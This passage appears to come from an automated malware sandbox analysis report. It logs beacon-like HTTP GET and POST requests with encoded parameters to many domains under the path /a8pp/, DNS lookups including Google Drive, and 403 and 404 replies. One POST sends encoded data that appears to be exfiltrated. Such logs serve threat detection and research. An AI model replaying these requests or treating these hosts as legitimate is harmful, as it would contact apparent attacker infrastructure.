        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=IPQzDRTPddNuZ/HMr4F9le4A0likp4cPjTBZoWar0DW2Dke1nHX7p3PJPbmWMxtVZQ2vG/Syy6/u7vfLcEQjJE0ZPWoRIvOz07zRtU0HA7dN58xUlB4x570=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.towelhoodie.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=u2uhCbPEKv8ZkpElCasipCYoh7hjVHsJeshUYXe+26UO54wjNRlGrJIqe2/bB2Gg6hxh2QUpPcZvKht3Zd5FEOczln0DFiPIHlW4j3CMtDHw4ZJy68kQvjE=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.seductionsessions.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=NgQpJdLFdHgIa+1l29O1770Oq5lPJcvTMZvJdcQ/YcKsMhli5q4lfY4xaSICRuQBpvWxqNirPVzUz7JPsPacp8Mg1AroxlnuY82gnIQ9XdoCkQd3w5aTNck=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.calmparents.usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=4Lb2evqbqWm/eQEsCRZbIPf+4WOFbtHQ6zBEferLjExJaXLZsL3GLbWlHTrS18+QwpI6CqjMoX8o4lQjVBd1hnajfrB87pxWL6PWkXnwG2oHKjYPIKLzKN0=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.tintasmaiscor.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=OIafhQlqd3+U0X685uCjXpA/yYYLTXRf5vcl7I4tT0pe2zvQLHkCRhCjRsaaEiaqAczN9yym/x5p7g+8tSCureiRSn+8K4wSoicHodjwuTrKVPMbvJXSPao=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.vgjimei.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.peptily.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.blissfulbooks.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.click-advertising.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.continentaloilandgas.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.barrettdigitalart.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.astralavenue.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.nurse-job2535.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.shootprecious.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.cyberpsychsecurity.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=OIafhQlqd3+U0X685uCjXpA/yYYLTXRf5vcl7I4tT0pe2zvQLHkCRhCjRsaaEiaqAczN9yym/x5p7g+8tSCureiRSn+8K4wSoicHodjwuTrKVPMbvJXSPao=&80k=Qv4d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.vgjimei.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.peptily.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.blissfulbooks.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.click-advertising.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.continentaloilandgas.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.barrettdigitalart.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.astralavenue.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.nurse-job2535.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.shootprecious.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.cyberpsychsecurity.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: www.peptily.shop
        Source: global trafficDNS traffic detected: DNS query: www.blissfulbooks.online
        Source: global trafficDNS traffic detected: DNS query: www.click-advertising.net
        Source: global trafficDNS traffic detected: DNS query: www.continentaloilandgas.com
        Source: global trafficDNS traffic detected: DNS query: www.barrettdigitalart.com
        Source: global trafficDNS traffic detected: DNS query: www.astralavenue.xyz
        Source: global trafficDNS traffic detected: DNS query: www.nurse-job2535.life
        Source: global trafficDNS traffic detected: DNS query: www.shootprecious.com
        Source: global trafficDNS traffic detected: DNS query: www.cyberpsychsecurity.com
        Source: global trafficDNS traffic detected: DNS query: www.gcashservice247.com
        Source: global trafficDNS traffic detected: DNS query: www.likbez22.store
        Source: global trafficDNS traffic detected: DNS query: www.towelhoodie.com
        Source: global trafficDNS traffic detected: DNS query: www.seductionsessions.co.uk
        Source: global trafficDNS traffic detected: DNS query: www.calmparents.us
        Source: global trafficDNS traffic detected: DNS query: www.tintasmaiscor.com
        Source: global trafficDNS traffic detected: DNS query: www.vgjimei.icu
        Source: global trafficDNS traffic detected: DNS query: www.cookwarecentrall.com
        Source: global trafficDNS traffic detected: DNS query: www.spazisostenibili.org
        Source: global trafficDNS traffic detected: DNS query: www.weeveno.com
        Source: global trafficDNS traffic detected: DNS query: www.issoweb.com
        Source: global trafficDNS traffic detected: DNS query: www.shigi.org
        Source: global trafficDNS traffic detected: DNS query: api.msn.com
        Source: global trafficDNS traffic detected: DNS query: www.digitoxmarketing.com
        Source: global trafficDNS traffic detected: DNS query: www.newstantonlocksmith.us
        Source: unknownHTTP traffic detected: POST /a8pp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.blissfulbooks.onlineOrigin: http://www.blissfulbooks.onlineReferer: http://www.blissfulbooks.online/a8pp/Content-Length: 205Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6d 32 31 49 44 42 52 54 43 38 61 48 55 37 44 4b 78 62 73 55 37 38 73 55 67 66 2b 72 42 64 65 52 53 6d 52 37 62 41 64 39 49 46 47 48 68 70 42 49 61 7a 43 53 50 42 41 4e 54 2f 45 4d 71 4f 77 2f 4a 44 2f 4f 6d 32 65 56 50 30 2b 74 71 63 67 43 62 4e 61 7a 6a 33 50 4c 47 66 63 35 34 35 67 4e 38 2b 57 5a 55 77 58 56 68 69 78 38 4a 7a 35 7a 33 36 66 43 52 31 32 43 5a 62 67 37 42 53 33 37 72 62 69 49 41 31 48 4f 67 6b 65 36 2b 2b 67 78 59 4a 5a 4b 32 74 4a 50 5a 72 43 4b 71 6f 56 52 61 4d 4f 6b 64 51 52 33 6a 53 39 4a 4b 72 59 65 79 62 6d 49 44 6e 31 34 65 65 30 4f 55 6d 50 34 48 67 3d 3d Data Ascii: 2NlhHLS8=m21IDBRTC8aHU7DKxbsU78sUgf+rBdeRSmR7bAd9IFGHhpBIazCSPBANT/EMqOw/JD/Om2eVP0+tqcgCbNazj3PLGfc545gN8+WZUwXVhix8Jz5z36fCR12CZbg7BS37rbiIA1HOgke6++gxYJZK2tJPZrCKqoVRaMOkdQR3jS9JKrYeybmIDn14ee0OUmP4Hg==
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:35:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:35:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:35:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 